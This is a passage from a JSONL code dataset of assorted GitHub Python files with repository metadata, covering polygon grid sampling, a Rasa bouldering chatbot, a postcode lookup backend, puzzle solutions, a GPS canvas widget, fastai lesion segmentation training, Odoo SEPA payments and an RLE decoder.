gridtype : {'regular','repr'}, default 'regular'\n Sample grid layout.\n step : number, default 100\n Grid points distance for regular grid.\n grid : GeoDataFrame, optional\n Existing grid for sampling (gridtype and step will be\n ignored).\n crs : str, default 'epsg:28992'\n Polygon map crs.\n\n \n \"\"\"\n\n if not isinstance(polygonmap,GeoDataFrame):\n raise Exception(f'Expect class GeoDataFrame, not {polygonmap.__class__}')\n\n self._poly = polygonmap\n self._step = step\n self._crs = crs\n\n if bbox is None:\n self._bbox = self._map_bounds()\n elif isinstance(bbox,GeoDataFrame):\n self._bbox = self._map_bounds(bbox)\n #self._bbox = bbox.total_bounds\n elif len(list(bbox))==4:\n self._bbox = bbox\n else:\n raise ValueError(f'Invalid bbox {bbox}')\n\n # Set grid or define new grid\n if grid is not None:\n\n if not isinstance(grid,GeoDataFrame):\n warnings.warn((f'Given grid is not GeoPandas but '\n f'{type(grid)}. New default grid will be created.'))\n grid = None\n self._gridpoints = grid\n\n if grid is None:\n \n if gridtype not in ['regular','repr']:\n warnings.warn((f'{gridtype} is not a valid grid type. 
'\n f'Regular grid will be returned.'))\n self._gridtype='regular'\n\n if gridtype=='regular':\n self._gridpoints = self._regular_grid()\n elif gridtype=='repr':\n self._gridpoints = self._poly.representative_point()\n self._gridpoints = self._gridpoints.reset_index(drop=True)\n \n # Sample the polygon on gridpoints\n self._sample = gpd.sjoin(self._gridpoints,self._poly,how='inner',op='within')\n self._sample = self._sample.reset_index(drop=True)\n if 'index_right' in self._sample.columns:\n self._sample = self._sample.drop(columns=['index_right'])\n\n\n def __repr__(self):\n npoly = len(self._poly)\n return f'{self.__class__.__name__} ({npoly} polygons)' \n\n def _map_bounds(self,polymap=None):\n \"\"\"Return boundary points for a regular sample grid that covers \n entire polygon shape\n \n Returns\n -------\n numpy.array([xmin,ymin,xmax,ymax])\n \n \"\"\"\n if polymap is None:\n polymap = self._poly\n\n xmin,ymin,xmax,ymax = polymap.total_bounds\n step = self._step\n xmin = xmin - (xmin % step)\n xmax = xmax - (xmax % step) + step\n ymin = ymin - (ymin % step)\n ymax = ymax - (ymax % step) + step\n return np.array([xmin,ymin,xmax,ymax])\n\n def _regular_grid(self):\n \"\"\"Return regular grid of sampling points\"\"\"\n gridpoints = self.regular_grid(bbox=self.bbox,step=self._step)\n return gridpoints\n\n @classmethod\n def regular_grid(cls, bbox=None, step=None):\n\n # set grid bounadries\n if bbox is None: # nederland\n xmin,ymin,xmax,ymax = cls.XMIN,cls.YMIN,cls.XMAX,cls.YMAX\n else:\n xmin,ymin,xmax,ymax = bbox\n\n # set grid distance\n if step is None:\n step = cls.STEP\n\n xp = np.arange(xmin,xmax,step)\n yp = np.arange(ymin,ymax,step)\n xx, yy = np.meshgrid(xp, yp)\n pointgeom = gpd.points_from_xy(xx.flatten(), yy.flatten(), crs=cls.CRS)\n gridpoints = gpd.GeoDataFrame(geometry=pointgeom)\n gridpoints['pointid'] = gridpoints.index.astype(str)\n gridpoints['pointarea_ha'] = step**2/10000\n\n return gridpoints\n\n\n\n @property\n def gridpoints(self):\n \"\"\"GeoDataFrame with gridpoints.\"\"\"\n return self._gridpoints\n\n @property\n def sample(self):\n \"\"\"GeoDataFrame with sampled values at gridpoints.\"\"\"\n return self._sample\n\n @property\n def bbox(self):\n \"\"\"Return grid boundaries as (xmin,ymin,xmax,ymax)\"\"\"\n return self._bbox\n\n def plot_sample(self):\n \"\"\"Plot map of gridpoints and sampled points\"\"\"\n fig, ax = plt.subplots()\n self.gridpoints.plot(ax=ax,color='#c0d6e4',markersize=1)\n self.sample.plot(ax=ax,color='#9000c0',markersize=5)\n plt.xticks(rotation=90)\n return ax","repo_name":"tdmeij/DSreader","sub_path":"DSreader/sample/samplepolygonmap.py","file_name":"samplepolygonmap.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70086540958","text":"# This files contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these action:\n# https://rasa.com/docs/rasa/core/actions/#custom-actions/\nimport random\nfrom typing import Any, Text, Dict, List, Union\n\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.forms import FormAction\nfrom rasa_sdk.executor import CollectingDispatcher\n\n\nTECHNIQUES = (\n \"Edging\",\n \"Smearing\",\n \"Flagging\",\n \"Stemming\",\n \"Bat Hang\",\n \"Lay-Backing\",\n \"Mantle\",\n \"Undercling\",\n \"Drop Knee/Back Step\",\n \"Cross Through\",\n \"Side Pull\",\n \"Palming\",\n \"Dyno\",\n \"Heel Hook\",\n \"Toe Hook\",\n \"Lock-off\",\n 
\"Gaston\",\n)\n\n\nclass ActionHelloWorld(Action):\n def name(self) -> Text:\n return \"action_list_random_techniques\"\n\n def run(\n self,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> List[Dict[Text, Any]]:\n\n techniques = random.choices(TECHNIQUES, k=5)\n dispatcher.utter_message(\n text=f\"Here are some common bouldering techniques: {', '.join(techniques)}.\"\n )\n\n return []\n\n\nclass GymForm(FormAction):\n def name(self) -> Text:\n return \"gym_form\"\n\n @staticmethod\n def required_slots(tracker: Tracker) -> List[Text]:\n return [\"gym_form_when\", \"gym_form_location\"]\n\n def submit(\n self,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> List[Dict]:\n # utter submit template\n dispatcher.utter_message(text=\"Cool, you can go to Berta Block!\")\n return []\n\n def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n \"\"\"\n Map the slots to entities.\n \"\"\"\n return {\n \"gym_form_when\": self.from_entity(entity=\"time\"),\n \"gym_form_location\": self.from_entity(entity=\"GPE\"),\n }\n","repo_name":"m-vdb/boulder-bot","sub_path":"actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"26440336800","text":"from typing import Any, Dict, Optional\n\nimport requests\n\nfrom django_postcode_lookup.backends import base\n\n\nclass PostcodeApiNu(base.Backend):\n\n def __init__(self, api_key: str, base_url: str, **kwargs):\n super(PostcodeApiNu, self).__init__(**kwargs)\n self._base_url = base_url\n self._session = requests.Session()\n self._session.headers = {\n \"x-api-key\": api_key,\n \"Accept\": \"application/json\"\n }\n\n def _get(self, postcode: str, number: str) -> Optional[base.PostcodeLookupResult]:\n postcode = postcode.replace(' ', '').upper()\n\n url = f\"{self._base_url}/{postcode}/{number}\"\n\n response = self._session.get(url)\n\n if response.status_code == 200:\n return _extract_results(response.json())\n\n\ndef _extract_results(result: Dict[str, Any]) -> base.PostcodeLookupResult:\n postcode = result[\"postcode\"]\n number = result['number']\n street = result[\"street\"]\n city = result['city']\n\n # format postcode to '1234 AA'\n if len(postcode) == 6:\n postcode = postcode[:4] + ' ' + postcode[4:]\n\n return base.PostcodeLookupResult(\n postcode=postcode,\n number=number,\n city=city,\n street=street)\n","repo_name":"labd/django-postcode-lookup","sub_path":"src/django_postcode_lookup/backends/postcodeapinu.py","file_name":"postcodeapinu.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"} +{"seq_id":"3303813539","text":"import sys\r\n\r\nerr, com = 0, []\r\nend_brackets = ')]}>'\r\nopen_brackets = '([{<'\r\nerrmap = dict(zip(end_brackets, [3, 57, 1197, 25137]))\r\ncommap = dict(zip(end_brackets, [1, 2, 3, 4]))\r\nmatch = dict(zip(end_brackets, open_brackets))\r\nrev_match = dict(zip(open_brackets, end_brackets))\r\nincomplete = []\r\nfor line in sys.stdin:\r\n line = line.strip()\r\n stack = []\r\n corrupt = False\r\n for i in line:\r\n if i in errmap:\r\n if match[i] != stack.pop():\r\n err += errmap[i]\r\n corrupt = True\r\n break\r\n else:\r\n stack.append(i)\r\n if stack and not corrupt:\r\n incomplete.append(stack)\r\nprint(\"Part 1:\", err)\r\n\r\nincomplete = list(map(lambda x: list(map(lambda y: rev_match[y], x[::-1])), 
incomplete))\r\nfor i in incomplete:\r\n score = 0\r\n for j in i:\r\n score *= 5\r\n score += commap[j]\r\n com.append(score)\r\nprint(\"Part 2:\", sorted(com)[len(com) // 2])","repo_name":"RussellDash332/aoc-2021","sub_path":"Day-10/Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"39910490280","text":"from functools import wraps\n\n\ndef offset_pagination(f):\n\n @wraps(f)\n def wrapper(self, request, *args, **kwargs):\n params = request.query_params.copy()\n offset = self.paginator.get_offset(request) + 1\n page_size = self.paginator.get_page_size(request)\n\n params.setdefault('start', offset)\n params.setdefault('num', page_size)\n\n request.pagination_params = params\n return f(self, request, *args, **kwargs)\n return wrapper\n","repo_name":"waffle-iron/arcgis-marketplace","sub_path":"arcgis_marketplace/api/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2008255664","text":"N = int(input())\r\n\r\ncard_list = list(map(int, input().split()))\r\n\r\nM = int(input())\r\n\r\nsearch_list = list(map(int, input().split()))\r\n\r\n\r\ncount_dict = {}\r\nfor card in card_list:\r\n if card in count_dict:\r\n count_dict[card] += 1\r\n else:\r\n count_dict[card] = 1\r\n\r\nresult_list = []\r\nfor search in search_list:\r\n if search in count_dict:\r\n result_list.append(count_dict[search])\r\n else:\r\n result_list.append(0)\r\n\r\nfor result in result_list:\r\n print(result, end=\" \")","repo_name":"jst0951/CodingTest","sub_path":"백준/Silver/10816. 숫자 카드 2/숫자 카드 2.py","file_name":"숫자 카드 2.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42711277930","text":"import sys\n\n\ndef pos2int(p):\n p = p.translate(str.maketrans(\"FBLR\", \"0101\"))\n p = int(p,2)\n return p\n\n\npos = list()\nfor line in sys.stdin.readlines():\n pos.append(pos2int(line))\n\npos.sort()\n\nfor i in range(1,len(pos)-1):\n if pos[i+1] == pos[i] + 2:\n print(pos[i]+1)\n sys.exit(0)\n","repo_name":"ribalda/adventofcode","sub_path":"2020/5/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35199490590","text":"import math\nimport logging\n\nfrom PyQt5.QtWidgets import QWidget, QMessageBox\nfrom PyQt5.QtCore import QTimer, Qt\nfrom qgis.core import QgsPointXY, QgsWkbTypes\nfrom iquaview.src.ui.ui_gps import Ui_GPSwidget\nfrom iquaview.src.canvastracks.canvasmarker import CanvasMarker\nfrom iquaview.src.cola2api.gps_driver import GpsDriver\n\nlogger = logging.getLogger(__name__)\n\n\nclass GPSWidget(QWidget, Ui_GPSwidget):\n\n def __init__(self, canvas, config, parent=None):\n super(GPSWidget, self).__init__(parent)\n self.setupUi(self)\n\n self.canvas = canvas\n self.config = config\n self.default_color = Qt.darkGreen\n\n width = self.config.csettings[\"vessel_width\"]\n length = self.config.csettings[\"vessel_length\"]\n\n self.marker = CanvasMarker(self.canvas, self.default_color,\n \":/resources/vessel.svg\", width, length,\n marker_mode=True, config=config)\n self.trackwidget.init(\"GPS track\", self.canvas, self.default_color, QgsWkbTypes.LineGeometry, self.marker)\n self.gps = None\n self.connected = False\n 
self.set_label_disconnected()\n\n # set signals\n self.connectButton.clicked.connect(self.connect)\n\n self.timer = QTimer()\n self.timer.timeout.connect(self.gps_update_canvas)\n\n def connect(self):\n if not self.connected:\n try:\n if self.config.csettings['gps_serial']:\n self.gps = GpsDriver(serial_port=self.config.csettings['gps_serial_port'],\n baud_rate=self.config.csettings['gps_serial_baudrate'])\n else:\n self.gps = GpsDriver(ip_addr=self.config.csettings['gps_ip'],\n hdt_port=self.config.csettings['gps_hdt_port'],\n gga_port=self.config.csettings['gps_gga_port'])\n\n self.gps.connect()\n\n self.gps.gpsconnectionfailed.connect(self.connection_failed)\n self.gps.gpsparsingfailed.connect(self.parsing_failed)\n self.connectButton.setText(\"Disconnect\")\n self.connected = True\n self.timer.start(1000)\n self.gps_status_label.setText(\"Connected\")\n self.gps_status_label.setStyleSheet('font:italic; color:green')\n except:\n logger.error(\"Connection with GPS could not be established\")\n QMessageBox.critical(self,\n \"Connection Failed\",\n \"Connection with GPS could not be established\",\n QMessageBox.Close)\n self.connected = False\n self.set_label_disconnected()\n self.trackwidget.centerButton.setEnabled(False)\n self.disconnect()\n else:\n self.disconnect()\n\n def disconnect(self):\n if self.gps is not None:\n self.gps.close()\n self.timer.stop()\n self.connected = False\n self.trackwidget.close()\n self.connectButton.setText(\"Connect\")\n self.trackwidget.centerButton.setEnabled(False)\n\n self.set_label_disconnected()\n\n def gps_update_canvas(self):\n if self.connected:\n data = self.gps.get_data()\n if data['status'] == 'new_data' and (data['quality'] >= 1) and (data['quality'] <= 5):\n gps_lat = data['latitude']\n gps_lon = data['longitude']\n gps_heading = data['heading']\n pos = QgsPointXY(gps_lon, gps_lat)\n self.trackwidget.track_update_canvas(pos,\n math.radians(gps_heading-self.config.csettings['gps_offset_heading']))\n self.gps_status_label.setText(\"Connected, receiving signal\")\n self.gps_status_label.setStyleSheet('font:italic; color:green')\n\n elif data['status'] == 'old_data':\n self.parsing_failed()\n\n\n def set_label_disconnected(self):\n self.gps_status_label.setText(\"Disconnected\")\n self.gps_status_label.setStyleSheet('font:italic; color:red')\n\n def parsing_failed(self):\n self.gps_status_label.setText(\"Connected, NO signal\")\n self.gps_status_label.setStyleSheet('font:italic; color:red')\n\n def connection_failed(self):\n QMessageBox.critical(self,\n \"Connection Failed\",\n \"Connection with GPS could not be established\",\n QMessageBox.Close)\n self.disconnect()\n\n def is_connected(self):\n return self.connected\n\n def update_width_and_length(self):\n width = self.config.csettings[\"vessel_width\"]\n length = self.config.csettings[\"vessel_length\"]\n self.marker.set_width(width)\n self.marker.set_length(length)\n self.gps_update_canvas()\n","repo_name":"martorelltorres/iquaview_1.1.0","sub_path":"iquaview/iquaview/src/canvastracks/gpswidget.py","file_name":"gpswidget.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30640492039","text":"class Solution:\n MAX_DEPTH = -1\n\n def traverse(self, node, cur_depth=1):\n if not node:\n return None\n\n self.MAX_DEPTH = max(self.MAX_DEPTH, cur_depth)\n\n self.traverse(node.left, cur_depth + 1)\n self.traverse(node.right, cur_depth + 1)\n\n def maxDepth(self, root: TreeNode) -> int:\n 
self.traverse(root)\n\n return self.MAX_DEPTH\n","repo_name":"readleyj/LeetCode","sub_path":"Python/0104_maximum-depth-of-binary-tree.py","file_name":"0104_maximum-depth-of-binary-tree.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14149371725","text":"from fastai.vision import *\nfrom sklearn.model_selection import KFold\nimport glob\nimport numpy as np\nimport configparser\nimport os\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module=\"torch.nn.functional\")\n\n# Custom imports\nsys.path.append('../../')\nfrom utils.model_export import custom_export\n\ndef training_loop(path_img, model_dir_path, all_images_paths, codes, size, bs, get_y_fn, k_folds, seed, lr_find=False):\n\n '''\n Training function for image segmentation\n :param path_img: path to images\n :param model_dir_path: path to save models\n :param all_images_paths: list of all image paths\n :param codes: names of the classes\n :param size: image size\n :param bs: batch size\n :param get_y_fn: function to get label names\n :param k_folds: number of folds\n :param seed: random seed\n :param lr_find: True if we want to find the optimal LR and false to directly train\n :return: None\n '''\n\n kf = KFold(n_splits=k_folds, shuffle=True, random_state=seed)\n\n n_fold = 0\n for train_index, test_index in kf.split(all_images_paths):\n print('Fold ' + str(n_fold))\n\n train_list, val_list = all_images_paths[train_index], all_images_paths[test_index]\n val_list_final = []\n for i_l in range(len(val_list)):\n val_list_final.append(val_list[i_l].split('/')[-1])\n\n model_dir = model_dir_path + 'fold-' + str(n_fold) + '/'\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n # create valid.txt\n src = (SegmentationItemList.from_folder(path_img)\n .split_by_files(val_list)\n .label_from_func(get_y_fn, classes=codes))\n\n data = (src.transform(get_transforms(max_zoom=1.3, max_lighting=0.4, max_warp=0.4, p_affine=1., p_lighting=1.),\n size=size, tfm_y=True)\n .databunch(bs=bs, num_workers=0)\n .normalize(imagenet_stats))\n\n # Define metrics\n metrics = [partial(dice, iou=True), dice]\n\n wd = 1e-2\n learn = unet_learner(data, models.resnet34, metrics=metrics, wd=wd)\n learn.model_dir = model_dir\n\n lr_def = 0\n if lr_find:\n learn.lr_find()\n fig = learn.recorder.plot(return_fig=True)\n fig.savefig('lr_figure_freezed_mixup.png')\n else:\n print('Training...')\n if lr_def == 0:\n lr = 1e-3\n else:\n lr = lr_def\n\n learn.fit_one_cycle(10, slice(lr), pct_start=0.9)\n learn.save('stage_1')\n print('Head training finished')\n\n learn.unfreeze()\n lrs = slice(lr / 400, lr / 4)\n learn.fit_one_cycle(12, lrs, pct_start=0.8)\n learn.save('stage_2')\n\n # Export model\n custom_export(model_dir, learn)\n\n # destroy learner\n learn.destroy()\n\n print('Training ' + 'fold ' + str(n_fold) + ' finished')\n n_fold += 1\n\n\nif __name__ == '__main__':\n\n # Load configuration file\n root = '../../'\n SERVABLE_CFG_FILE = root + 'config.ini'\n config = configparser.ConfigParser()\n config.read(SERVABLE_CFG_FILE)\n\n # Input params defined in config file\n seed = int(config['PARAMS']['SEED'])\n device = int(config['PARAMS']['DEVICE'])\n bs = int(config['PARAMS']['BS_SEG'])\n size = int(config['PARAMS']['IMG_SIZE'])\n k_folds = int(config['PARAMS']['K_FOLDS'])\n\n # Classes\n category_0 = config['TAXONOMY']['CATEGORY_0']\n category_1 = config['TAXONOMY']['CATEGORY_1']\n codes = [category_0, category_1]\n\n # Set 
the path to save the models\n model_dir_path_1 = 'MODEL_PATH_EXP1'\n model_dir_path_2 = 'MODEL_PATH_EXP2'\n\n # Set device\n torch.cuda.set_device(device)\n\n # Experiment 1\n # Get paths\n root_path = config['DATA']['DATASET_ROOT_PATH']\n path = root_path + 'LegitHealth-AD/'\n path_img = path + 'images/'\n path_label = path + 'labels/lesion_segmentation/ground_truth_masks/'\n get_y_fn = lambda x: path_label + f'{x.stem}.png'\n\n # Read image paths for K-fold\n all_images_paths = glob.glob(path_img + '*')\n all_images_paths = np.asarray(all_images_paths)\n\n # Training loop using K-fold strategy\n training_loop(path_img, model_dir_path_1, all_images_paths, codes, size, bs, get_y_fn, k_folds, seed)\n\n # Experiment 2\n # Get paths\n path = root_path + 'LegitHealth-V1-V2-V3'\n path_img = path + 'images/'\n path_label = path + 'labels/lesion_segmentation/ground_truth_masks/'\n get_y_fn = lambda x: path_label + f'{x.stem}.png'\n\n # Load only V3 images for K-fold\n path = root_path + 'LegitHealth-AD-FPK-IVI/'\n v3_image_paths = glob.glob(path + '*')\n v3_image_paths = np.asarray(v3_image_paths)\n\n training_loop(path_img, model_dir_path_2, v3_image_paths, codes, size, bs, get_y_fn, k_folds, seed)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"alfonmedela/ASCORAD","sub_path":"code/A_lesion_segmentation/train/main_train.py","file_name":"main_train.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"72335353437","text":"import sys\n\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\nline = input().split()\nN = int(line[0])\nA = int(line[1])\nC = int(line[2])\nAC = A + C\n\nnbsteroid = [int(i) for i in input().split()]\n\n# cumsteroid = nbsteroid[:]\n# for i in range(1, N):\n# cumsteroid[i] += cumsteroid[i-1]\n\nclass ShieldSession:\n def __init__(self, next = None) -> None:\n self.next = next\n self.time = 0\n self.shift = 0\n\n def is_expired(self):\n return self.shift == AC\n\n def reset(self):\n self.time = 0\n\n def tick(self):\n if self.next != None:\n self.next.tick()\n if self.next.is_expired():\n self.next.reset()\n self.shift += 1\n\n else:\n self.shift += 1\n\n def protect(self):\n if self.time == AC + self.shift:\n return self.next.protect()\n result = (self, self.time < self.shift or self.time >= self.shift + A)\n self.time += 1\n return result\n\nbest = float(\"inf\")\n\nshield = None\nfor _ in range(N):\n shield = ShieldSession(shield)\n\nwhile not shield.is_expired():\n score = 0\n s = shield\n\n for i in range(N):\n eprint(\"arrivé\", i)\n s, unprotected = s.protect()\n if unprotected:\n score += nbsteroid[i]\n \n best = min(score, best)\n shield.tick()\n\nprint(best)","repo_name":"Dabsunter/BattleDev-S17","sub_path":"exo5.py","file_name":"exo5.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"31107664222","text":"# image_viewer.py\nimport io\nimport os\nimport img2pdf\nimport PySimpleGUI as sg\nfrom PIL import Image\nfile_types = [(\"JPEG (*.jpg)\", \"*.jpg\"),\n (\"All files (*.*)\", \"*.*\")]\ndef main():\n layout = [\n [sg.Image(key=\"-IMAGE-\")],\n [\n sg.Text(\"Image File\"),\n sg.Input(size=(25, 1), key=\"-FILE-\"),\n sg.FileBrowse(file_types=file_types),\n sg.Button(\"Load Image\"),\n sg.Button(\"Convert Image to .pdf\")\n ],\n ]\n window = sg.Window(\"Image Viewer\", layout)\n while True:\n event, values = window.read()\n if event == \"Exit\" or event 
== sg.WIN_CLOSED:\n break\n if event == \"Load Image\":\n filename = values[\"-FILE-\"]\n if os.path.exists(filename):\n image = Image.open(values[\"-FILE-\"])\n image.thumbnail((400, 400))\n bio = io.BytesIO()\n image.save(bio, format=\"PNG\")\n window[\"-IMAGE-\"].update(data=bio.getvalue())\n break\n break\n # if event == \"Convert Image to .pdf\":\n # with open(\"output.pdf\", \"wb\") as f:\n # f.write(img2pdf.convert([i for i in os.listdir('.')if i.endswith(\".jpg\")]))\n # break\n\n\n #window.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"DrewHall1/CodeLouPythonGUIconverter","sub_path":"viewer_two.py","file_name":"viewer_two.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"72113518238","text":"import gym\nimport numpy as np\n\ndef fitness(net):\n env = gym.make('CartPole-v1')\n obs = env.reset()\n obs=obs[0]\n done = False\n total_reward = 0\n while not done:\n \n action = net.forward(obs)\n action = np.argmax(action.flatten())\n\n obs, reward, trun,term, info = env.step(action)\n if trun or term:\n done = True\n total_reward += reward\n \n env.close()\n return total_reward\n","repo_name":"Joachm/enu_project_cpu","sub_path":"rollout.py","file_name":"rollout.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16160690062","text":"from odoo import models, fields\n\n\nclass L10nLatamDocumentType(models.Model):\n\n _inherit = 'l10n_latam.document.type'\n\n internal_type = fields.Selection(\n selection_add=[\n ('invoice', 'Invoices'),\n ('invoice_in', 'Purchase Invoices'),\n ('debit_note', 'Debit Notes'),\n ('credit_note', 'Credit Notes'),\n ('receipt_invoice', 'Receipt Invoice')])\n\n def _get_document_sequence_vals(self, journal):\n values = super(L10nLatamDocumentType, self)._get_document_sequence_vals(journal)\n if self.country_id != self.env.ref('base.cl'):\n return values\n values.update({\n 'padding': 6,\n 'implementation': 'no_gap',\n 'l10n_latam_document_type_id': self.id,\n 'prefix': None\n })\n return values\n\n def _filter_taxes_included(self, taxes):\n \"\"\" In Chile we include taxes in line amounts depending on type of document.\n This serves just for document printing purposes \"\"\"\n self.ensure_one()\n if self.country_id == self.env.ref('base.cl') and self.code in ['39', '41', '110', '111', '112', '34']:\n return taxes.filtered(lambda x: x.tax_group_id == self.env.ref('l10n_cl.tax_group_iva_19'))\n return super()._filter_taxes_included(taxes)\n","repo_name":"saifDiu/odoo_13_my_module","sub_path":"addons/l10n_cl/models/l10n_latam_document_type.py","file_name":"l10n_latam_document_type.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"9011678854","text":"import sys\r\nfrom random import randint\r\ndef ver(a,b):\r\n\tif(a>b):\r\n\t\tprint(\"Too high!\")\r\n\tif(a None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('notes', sa.Column('user_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'notes', 'users', ['user_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, 'notes', type_='foreignkey')\n op.drop_column('notes', 'user_id')\n # ### end Alembic commands ###\n","repo_name":"42musaev/elcode","sub_path":"backend/alembic/versions/75335e95ea22_created_relationship.py","file_name":"75335e95ea22_created_relationship.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"40365799641","text":"class graveDAO:\n def __init__(self, player, name, job, gold, runs, map, weapons, dungeon, dlevel, mon, looted):\n self.player = player\n self.name = name\n self.job = job\n self.gold = gold\n self.runs = runs\n self.map = map\n self.weapon = weapons\n self.dungeon = dungeon\n self.dlevel = dlevel\n self.mon = mon\n self.looted = looted\n","repo_name":"JenMart/DSR.02","sub_path":"app/models/graveyard.py","file_name":"graveyard.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74265718557","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\n\n\nclass AccountAbstractPayment(models.AbstractModel):\n _inherit = \"account.abstract.payment\"\n\n @api.model\n def _get_method_codes_using_bank_account(self):\n res = super(AccountAbstractPayment, self)._get_method_codes_using_bank_account()\n res.append('sepa_ct')\n return res\n\n\nclass AccountRegisterPayments(models.TransientModel):\n _inherit = \"account.register.payments\"\n\n partner_bank_account_id = fields.Many2one('res.partner.bank', string=\"Recipient Bank Account\")\n\n\n @api.onchange('payment_method_id')\n def _onchange_payment_method_id(self):\n if self.payment_method_id == self.env.ref('account_sepa.account_payment_method_sepa_ct'):\n if self._context.get('active_model') == 'account.invoice':\n invoice_ids = self._context.get('active_ids', [])\n partners = self.env['account.invoice'].browse(invoice_ids).mapped('partner_id')\n\n return {'domain':\n {'partner_bank_account_id': [('partner_id', 'in', partners.ids + partners.mapped('commercial_partner_id').ids)]}\n }\n\n\nclass AccountPayment(models.Model):\n _inherit = \"account.payment\"\n\n partner_bank_account_id = fields.Many2one('res.partner.bank', string=\"Recipient Bank Account\")\n\n @api.one\n @api.constrains('payment_method_id', 'journal_id')\n def _check_bank_account(self):\n if self.payment_method_id == self.env.ref('account_sepa.account_payment_method_sepa_ct'):\n if not self.journal_id.bank_account_id or not self.journal_id.bank_account_id.acc_type == 'iban':\n raise ValidationError(_(\"The journal '%s' requires a proper IBAN account to pay via SEPA. Please configure it first.\") % self.journal_id.name)\n if not self.journal_id.bank_account_id.bank_bic:\n raise ValidationError(_(\"The account '%s' (journal %s) requires a Bank Identification Code (BIC) to pay via SEPA. Please configure it first.\")\n % (self.journal_id.bank_account_id.acc_number, self.journal_id.name))\n\n @api.one\n @api.constrains('payment_method_id', 'partner_bank_account_id')\n def _check_partner_bank_account(self):\n if self.payment_method_id == self.env.ref('account_sepa.account_payment_method_sepa_ct'):\n # Note, the condition allows to use non-IBAN account. 
SEPA actually supports this under certain conditions\n            if self.partner_bank_account_id.acc_type == 'iban' and not self.partner_bank_account_id.bank_bic:\n                raise ValidationError(_(\"The partner account '%s' requires a Bank Identification Code (BIC) to pay via SEPA. Please configure it first.\") % self.partner_bank_account_id.acc_number)\n\n    @api.onchange('destination_journal_id')\n    def _onchange_destination_journal_id(self):\n        if hasattr(super(AccountPayment, self), '_onchange_destination_journal_id'):\n            super(AccountPayment, self)._onchange_destination_journal_id()\n        if self.destination_journal_id:\n            bank_account = self.destination_journal_id.bank_account_id\n            self.partner_id = bank_account.company_id.partner_id\n            self.partner_bank_account_id = bank_account\n","repo_name":"allanwong/odoo-ent12","sub_path":"odoo/addons/account_sepa/models/account_payment.py","file_name":"account_payment.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7441159887","text":"\"\"\"Utility functions.\"\"\"\n\nimport sys\nfrom typing import Generator, Optional\n\nimport numpy as np\n\nfrom rle._rle import decode_frame, decode_segment, encode_frame, encode_segment\n\n\ndef decode_pixel_data(\n    src: bytes, ds: Optional[\"Dataset\"] = None, **kwargs\n) -> \"np.ndarray\":\n    \"\"\"Return the decoded RLE Lossless data as a :class:`numpy.ndarray`.\n\n    Intended for use with *pydicom* ``Dataset`` objects.\n\n    Parameters\n    ----------\n    src : bytes\n        A single encoded image frame to be decoded.\n    ds : pydicom.dataset.Dataset, optional\n        A :class:`~pydicom.dataset.Dataset` containing the group ``0x0028``\n        elements corresponding to the image frame. If not used then `kwargs`\n        must be supplied.\n    **kwargs\n        Required keys if `ds` is not supplied:\n\n        * ``\"rows\"``: :class:`int` - the number of rows in the decoded image\n        * ``\"columns\"``: :class:`int` - the number of columns in the decoded\n          image\n        * 